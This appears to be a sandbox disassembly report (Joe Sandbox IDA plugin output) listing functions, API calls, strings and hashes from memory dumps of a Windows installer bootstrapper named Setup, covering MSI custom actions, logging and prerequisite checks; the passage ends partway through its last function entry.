Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: 100$10000$100000$12000$120000$150$1500$15000$1500000$1800$2000$20000$200000$3000$30000$3000000$500$5000$6000$800$8000$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppSearch$BindImage$Complus$Component$Component_$CostFinalize$CostInitialize$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature_$File$FileCost$FileSize$Font$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$InstallValidate$Location$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Patch$PatchFiles$PatchSize$ProcessComponents$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveExistingProducts$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveODBC$RemoveRegistry$RemoveRegistryValues$RemoveShortcuts$SelfReg$SelfRegModules$SelfUnregModules$ServiceControl$ServiceInstall$Shortcut$StartServices$StopServices$TypeLib$UnpublishComponents$UnpublishFeatures$UnregisterClassInfo$UnregisterComPlus$UnregisterExtensionInfo$UnregisterFonts$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$~$&_'
API String ID: 0-1070699578
Opcode ID: c40f9783042379472b1f9b71962577ca282a6a99c377a9a43648066f3be64348
Instruction ID: 6eb0dc460d0dfd4321c3c7e56c62d94dde73a8a51c638a732d53ddfe4c1e15b5
Opcode Fuzzy Hash: c40f9783042379472b1f9b71962577ca282a6a99c377a9a43648066f3be64348
Instruction Fuzzy Hash: 9B73D6A0A953C5B9D741DBE19D1535B3A769FA2708F20834DE2442F2E1CFF806C6C7A6

Function 00714663 Relevance: 66.4, APIs: 25, Strings: 12, Instructions: 1649memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

VariantClear.OLEAUT32(?), ref: 00714943
VariantClear.OLEAUT32(?), ref: 00714A89
VariantClear.OLEAUT32(?), ref: 00714ABE
VariantClear.OLEAUT32(?), ref: 00714C54
SysAllocString.OLEAUT32(00000000), ref: 00714C65
VariantClear.OLEAUT32(?), ref: 00714CAF
VariantClear.OLEAUT32(?), ref: 00714CD8
SysFreeString.OLEAUT32(00000000), ref: 00714CE3
VariantClear.OLEAUT32(?), ref: 00714DF5
VariantClear.OLEAUT32(?), ref: 00714E2A
VariantClear.OLEAUT32(?), ref: 00714E84
VariantClear.OLEAUT32(?), ref: 00714F43
VariantClear.OLEAUT32(?), ref: 00714911

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

VariantClear.OLEAUT32(?), ref: 00714A28
VariantClear.OLEAUT32(?), ref: 00714A54
VariantClear.OLEAUT32(?), ref: 007150BA
SysAllocString.OLEAUT32(00000000), ref: 007150CB
VariantClear.OLEAUT32(?), ref: 00715115
VariantClear.OLEAUT32(?), ref: 0071513E
SysFreeString.OLEAUT32(00000000), ref: 00715149
VariantClear.OLEAUT32(?), ref: 0071524C
VariantClear.OLEAUT32(?), ref: 007152A3
VariantClear.OLEAUT32(?), ref: 007152CC
SysFreeString.OLEAUT32(00000000), ref: 007152DA

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

GetFontHeight, xrefs: 00715AF0
MsiEvaluateCondition, xrefs: 007154F8
MsiGetBinaryPath, xrefs: 00715676
MsiSetProperty, xrefs: 00715380
MsiGetProperty, xrefs: 00715439
MsiGetFormattedError, xrefs: 00715A31
MsiGetBinaryPathIndirect, xrefs: 00715735
MsiResolveFormatted, xrefs: 007155B7
MsiPublishEvents, xrefs: 007157F4
&_', xrefs: 007149E8, 00714DAB, 007151D8, 00715358
MsiGetBytesCountText, xrefs: 00715972
MessageBox, xrefs: 007158B3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ClearVariant$String$Free$AllocHeap$AllocateFindProcessResource
String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty$&_'
API String ID: 2653467708-2685190252
Opcode ID: a4fd2018036ebe4bd1451fc7b8625499db410ef98f9734cf4dab20295e8f88fa
Instruction ID: b4af9e48ee61ab360ec81117b6f8b76859fc307e448dfdc1db9e4ac72ecd22b8
Opcode Fuzzy Hash: a4fd2018036ebe4bd1451fc7b8625499db410ef98f9734cf4dab20295e8f88fa
Instruction Fuzzy Hash: 83E2AE71D10248DFCB14DFA8CC44BEEBBB5FF48314F248219E515AB291EB74AA85CB90

Function 0083E460 Relevance: 40.8, APIs: 14, Strings: 9, Instructions: 524fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00A68394,C0000000,00000003,00000000,00000004,00000080,00000000,275F26E1,00000000,00A68388,00A68370), ref: 0083E4D8
GetLastError.KERNEL32 ref: 0083E500
OutputDebugStringW.KERNEL32(00000000,00000020), ref: 0083E585
OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 0083E6B2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 0083E74E

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

OutputDebugStringW.KERNEL32(00000000,?,0000001D), ref: 0083E7F1
WriteFile.KERNEL32(00000000,0098589D,00000002,00000002,00000000,?,0000001D), ref: 0083E89A
FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 0083E8A3
WriteFile.KERNEL32(00000000,00A67640,00000000,00000002,00000000,?,0000001D), ref: 0083E8C5
WriteFile.KERNEL32(00000000,000000FF,?,00000002,00000000,009D6DBC,00000002), ref: 0083E984
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001D), ref: 0083E98D
FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 0083E8CE

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

WriteFile.KERNEL32(00000000,000000FF,?,00000002,00000000,009D6DBC,00000002), ref: 0083EA39
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001D), ref: 0083EA42

Strings

x64, xrefs: 0083E91E, 0083E92A
LOGGER->Reusing LOG file at:, xrefs: 0083E657, 0083E669, 0083E673
LOGGER->Creating LOG file at:, xrefs: 0083E796, 0083E7A8, 0083E7B2
OS Version: %u.%u.%u SP%u (%s) [%s], xrefs: 0083E954
LOGGER->failed to create LOG at:, xrefs: 0083E540, 0083E552, 0083E55C
server, xrefs: 0083E930, 0083E938
workstation, xrefs: 0083E92B
x86, xrefs: 0083E915
&_', xrefs: 0083E47A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$BuffersFlushWrite$DebugOutputString$CreateErrorFindHeapLastPointerProcessResource
String ID: LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86$&_'
API String ID: 611875259-1293439912
Opcode ID: 9c2dbafffc6dbaafca59dd78004d4ae41784ae7475f39ebf0d32e899c127552a
Instruction ID: 0821fdc36a93160259f9fadd283938fab7799af34d0a54b1e3a19309e4645302
Opcode Fuzzy Hash: 9c2dbafffc6dbaafca59dd78004d4ae41784ae7475f39ebf0d32e899c127552a
Instruction Fuzzy Hash: 6312AA31A052199BDB04DFA8CC45BADBBB6FF84320F154259E825EB3D1DB74AE01DB80

Function 00702F80 Relevance: 26.8, APIs: 14, Strings: 1, Instructions: 595windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00703055
ShowWindow.USER32(?,00000000), ref: 00703074
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00703082
GetWindowRect.USER32(?,?), ref: 00703099
ShowWindow.USER32(?,00000000), ref: 007030BA
SetWindowLongW.USER32(00000000,000000EB,?), ref: 007030D1

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

ShowWindow.USER32(?,?,?,00000000), ref: 0070327D
GetWindowLongW.USER32(?,000000EB), ref: 007032B1
ShowWindow.USER32(?,?,?,00000000), ref: 007032CF
GetWindowRect.USER32(?,?), ref: 007032F9
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0070348A
GetWindowRect.USER32(?,?), ref: 0070353B
GetWindowRect.USER32(?,?), ref: 00703586
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 007035C3

Strings

&_', xrefs: 00702F89, 00703199, 007033B4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$LongRectShow$MessageSend$AllocateHeap
String ID: &_'
API String ID: 2680428312-2411122644
Opcode ID: 9bf7a42018044f2ab60d0eeb5d1925bc99a046ca3329227b210948704461f889
Instruction ID: 35022bb5aa065d87652c640cf55a828b4ca63a639642070684a6f9f059665eff
Opcode Fuzzy Hash: 9bf7a42018044f2ab60d0eeb5d1925bc99a046ca3329227b210948704461f889
Instruction Fuzzy Hash: 30327C71A04205DFCB15CF68C884AAEBBF9FF88310F15465DF855A72A0DB34EA46CB91

Function 006F8110 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 411memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006F85F0: EnterCriticalSection.KERNEL32(00A6D6DC,275F26E1,00000000,?,?,?,?,?,?,006F7D55,0093FE5D,000000FF), ref: 006F862D
Part of subcall function 006F85F0: LoadCursorW.USER32(00000000,00007F00), ref: 006F86A8
Part of subcall function 006F85F0: LoadCursorW.USER32(00000000,00007F00), ref: 006F8750

SysFreeString.OLEAUT32(00000000), ref: 006F81D0
SysAllocString.OLEAUT32(00000000), ref: 006F820B
GetWindowLongW.USER32(?,000000EC), ref: 006F82D9
GetWindowLongW.USER32(?,000000EC), ref: 006F82E9
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006F82F8
NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F7D55,00000000), ref: 006F830A
GetWindowLongW.USER32(?,000000EB), ref: 006F8318
SetWindowTextW.USER32(?,009D3180), ref: 006F83C6
GlobalAlloc.KERNEL32(00000042,00000000), ref: 006F83F7
GlobalLock.KERNEL32(00000000), ref: 006F8405
GlobalUnlock.KERNEL32(?), ref: 006F8457
SetWindowLongW.USER32(?,000000EB,00000000), ref: 006F84ED
SysFreeString.OLEAUT32(00000000), ref: 006F8510
SysFreeString.OLEAUT32(00000000), ref: 006F857F

Strings

&_', xrefs: 006F7EFF, 006F8127, 006F8294

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$Long$String$FreeGlobal$AllocCursorLoad$CriticalEnterLockNtdllProc_SectionTextUnlock
String ID: &_'
API String ID: 3547321447-2411122644
Opcode ID: a06e4ac9289b542176ecf4d85a6f4b8d6084d231a21245217dadc0547b5e69bc
Instruction ID: f97643c68639f8c423933786482fa6ebe7789ae3ae92dc52d2a9698ccf9b8ede
Opcode Fuzzy Hash: a06e4ac9289b542176ecf4d85a6f4b8d6084d231a21245217dadc0547b5e69bc
Instruction Fuzzy Hash: 3FE1C271A04219DFDF00DFA8CC49BAEBBBAEF49710F144198E915A7390CB759E41CBA1

Function 0072E9E0 Relevance: 23.9, APIs: 5, Strings: 8, Instructions: 1106stringsleepCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?, ?(-|/)+q,009D8DD6,?), ref: 0072EE43
lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?, ?(-|/)+q,009D8DD6,?), ref: 0072EFC3
std::_Throw_Cpp_error.LIBCPMT ref: 0072F61B

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?, ?(-|/)+q,009D8DD6,?), ref: 0072F577

Part of subcall function 00848020: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,275F26E1,?,00000000), ref: 0084806B
Part of subcall function 00848020: GetLastError.KERNEL32(?,00000000), ref: 00848075

std::_Throw_Cpp_error.LIBCPMT ref: 0072F8E7

Strings

msix, xrefs: 0072ED11
msixbundle, xrefs: 0072EE62
?(-|/)+q, xrefs: 0072EB7C
Launch failed. Error:, xrefs: 0072F3C6
Launching file:, xrefs: 0072EA9B
Return code of launched file:, xrefs: 0072F4C2
&_', xrefs: 0072EA0B, 0072F657, 0072F912
appx, xrefs: 0072EFDE

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cpp_errorThrow_lstrcmpistd::_$ErrorFormatHeapLastMessageProcessSleep
String ID: ?(-|/)+q$Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle$&_'
API String ID: 2753205561-3962788221
Opcode ID: d397ca8c0c9983373a140ae4a82bf8675009064a9a9b4fec75c3ffad8cd50e48
Instruction ID: bec05fe8f1ea181e76f6b54be128426a428af19857e99a596d296d66aff51228
Opcode Fuzzy Hash: d397ca8c0c9983373a140ae4a82bf8675009064a9a9b4fec75c3ffad8cd50e48
Instruction Fuzzy Hash: 73A2CF71D00268CFDB24DF68C845BADB7B1BF45314F2482A9E819A72C1DB74AE85CF91

Function 00852D10 Relevance: 21.5, APIs: 3, Strings: 9, Instructions: 540fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

FindFirstFileW.KERNEL32(?,?,00000000,00000000), ref: 008531C6
FindClose.KERNEL32(00000000), ref: 008531FA
FindClose.KERNEL32(00000000), ref: 008532A6

Strings

An acceptable version was found., xrefs: 00853846
No acceptable version found. It must be downloaded manually from a site., xrefs: 0085385B
No acceptable version found. It must be installed from package., xrefs: 0085384D
No acceptable version found., xrefs: 00853870
No acceptable version found. It must be downloaded., xrefs: 00853854
Not selected for install., xrefs: 00853877
No acceptable version found. Operating System not supported., xrefs: 00853862
&_', xrefs: 00852D27, 00853097, 008539F7
No acceptable version found. It is already downloaded and it will be installed., xrefs: 00853869

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Find$Close$FileFirstHeapProcess
String ID: An acceptable version was found.$No acceptable version found.$No acceptable version found. It is already downloaded and it will be installed.$No acceptable version found. It must be downloaded manually from a site.$No acceptable version found. It must be downloaded.$No acceptable version found. It must be installed from package.$No acceptable version found. Operating System not supported.$Not selected for install.$&_'
API String ID: 4254541338-1288754972
Opcode ID: 0eceaea14ffa8327684138fcb21d1a1ee9b29327a5279f171728db36f0f7adf4
Instruction ID: 1450423422e37542f069c438872080f56f9d88534c0e473720625be71cfd3aae
Opcode Fuzzy Hash: 0eceaea14ffa8327684138fcb21d1a1ee9b29327a5279f171728db36f0f7adf4
Instruction Fuzzy Hash: 8D227B30A04B598FCF15DF68C8986AEBBA1FF09321F1442A9D815D7391DB74EE08CB81

Function 00728100 Relevance: 21.5, APIs: 2, Strings: 10, Instructions: 502libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00728660
GetProcAddress.KERNEL32(00000000,00000000), ref: 007286D7

Strings

Target, xrefs: 00728332, 00728540
Source, xrefs: 00728386, 007284CA
SELECT `Data` FROM `Binary` WHERE `Name` = ', xrefs: 007285F0
EmbeddedUIInstallHandleAccessServer, xrefs: 00728594
invalid stoi argument, xrefs: 00728738
CustomAction, xrefs: 0072818E
stoi argument out of range, xrefs: 00728742
Type, xrefs: 00728249
&_', xrefs: 00728117, 00728774
`Action`= ', xrefs: 00728151

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: CustomAction$EmbeddedUIInstallHandleAccessServer$SELECT `Data` FROM `Binary` WHERE `Name` = '$Source$Target$Type$`Action`= '$invalid stoi argument$stoi argument out of range$&_'
API String ID: 2574300362-3328785501
Opcode ID: 3c6c48a2e0d34ad6d624c7ee29e9be12c7b2b794cc8cc8648aad66635a2223b4
Instruction ID: e35d5a6d8c3c9bc1a39cdb6bb65517e52dbf3642dc3567b728b97dedbc2db950
Opcode Fuzzy Hash: 3c6c48a2e0d34ad6d624c7ee29e9be12c7b2b794cc8cc8648aad66635a2223b4
Instruction Fuzzy Hash: 08120270D01298DFDB14DFA4DC45BEEBBB1AF54304F248199E405B7282DB796E84CBA2

Function 00704DD0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 396fileCOMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000,00000000), ref: 00704E35
PathIsUNCW.SHLWAPI(275F26E1,*.*,00000000), ref: 00704EFB
FindFirstFileW.KERNEL32(275F26E1,00000000,*.*,00000000), ref: 0070508C
GetFullPathNameW.KERNEL32(275F26E1,00000000,00000000,00000000), ref: 007050A6
GetFullPathNameW.KERNEL32(275F26E1,00000000,?,00000000), ref: 007050D9
FindClose.KERNEL32(00000000,?,00000000), ref: 00705141
SetLastError.KERNEL32(0000007B,?,00000000), ref: 0070514B

Strings

*.*, xrefs: 00704E5F, 00704EC8, 00704EC9
\\?\UNC\, xrefs: 00704F1B, 00704FF3
\\?\, xrefs: 00705009, 00705073
&_', xrefs: 00704DE7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FindPath$CloseFullName$ErrorFileFirstLast
String ID: *.*$\\?\$\\?\UNC\$&_'
API String ID: 539638818-3027919815
Opcode ID: 8825ad93f368f541ad6f4ec2e7ad4b7ece15d5eafc22ca6a4a56583bd46dc3a1
Instruction ID: 13707453ae34a68d78c00dd4aa7a99f8d98c3946b8c2346780a1e19da4434cfd
Opcode Fuzzy Hash: 8825ad93f368f541ad6f4ec2e7ad4b7ece15d5eafc22ca6a4a56583bd46dc3a1
Instruction Fuzzy Hash: 2FE19C71A00A05DBDB14DFA8CC59BAEB7E2FF44314F14426CE9169B3E1DB79A941CB80

Function 00848F20 Relevance: 16.4, APIs: 7, Strings: 2, Instructions: 605COMMON

Download Yara Rule

APIs

Part of subcall function 00911995: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119A0
Part of subcall function 00911995: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119DA

GetStdHandle.KERNEL32(000000F5,?,275F26E1,?,?), ref: 00849317
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 0084931E
GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00849332
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00849339
GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,009D6DBC,00000002,?,?), ref: 008493F2
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 008493F9
IsWindow.USER32(00000000), ref: 00849698

Strings

Error, xrefs: 0084962B
&_', xrefs: 00848F37, 00849883

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ConsoleHandle$AttributeExclusiveLockText$AcquireBufferInfoReleaseScreenWindow
String ID: Error$&_'
API String ID: 2349801371-4023260024
Opcode ID: afd5f9369bb080e75a066b52980b02005ad94e2deb1207fed81f2602d135a1e6
